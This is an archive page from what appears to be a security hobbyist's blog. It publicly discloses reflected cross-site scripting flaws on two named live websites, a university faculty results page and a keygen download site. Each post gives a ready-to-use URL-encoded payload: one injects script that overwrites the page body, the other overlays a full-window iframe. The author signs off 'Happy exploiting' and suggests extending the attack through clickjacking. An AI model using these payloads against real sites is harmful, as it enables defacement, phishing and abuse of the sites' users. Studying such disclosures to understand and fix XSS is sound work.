Archive for XSS

Alexandrea University: Faculty of Commerce.. vulnerable to XSS

Posted in XSS with tags , , , on March 13, 2011 by Xacker

Hi again,

The Faculty of Commerce at Alexandrea university is found vulnerable to XSS attacks.

An attacker could easily lure the victim into clicking a malicious URL that could be used to display malicious or possibly incorrect content on the web page.

Although the form specifies POST requests instead of GET in the source-code, the ASP web page is coded to handle both, perhaps, with POST preferred over GET if provided.

PoC:

hxxp://www.alex-commerce.edu.eg/Result42.asp?fld1=%22%3E%3Cscript%3Edocument.getElementsByTagName%28%27body%27%29[0].innerHTML=%27%3Ch1%3EXSS%20Vulnerability%20-%20by%20Xacker%3C/h1%3E%27%3C/script%3E

Happy exploiting.

Advertisements

KeyGen.us users: vulnerable to XSS attacks

Posted in XSS with tags , , on October 14, 2010 by Xacker

Keygen.us (porn free) is vulnerable to XSS attacks which might be applied on poor users

example:

http://www.keygen.us/search.shtml?q=%22%3E%3Ciframe%20width=”100%”%20height=”100%”%20style=”position:absolute;top:0;left:0″%20src=%22https://xacker.wordpress.com%22%20/%3E&w=cracks

w00ps!

isn’t that my blog ? 🙂

This is a simple demonstration, the attack vector might be extended through Clickjacking and/or Tabjacking techniques.

Update: here is a screenshot in case they fix it 🙂

Later.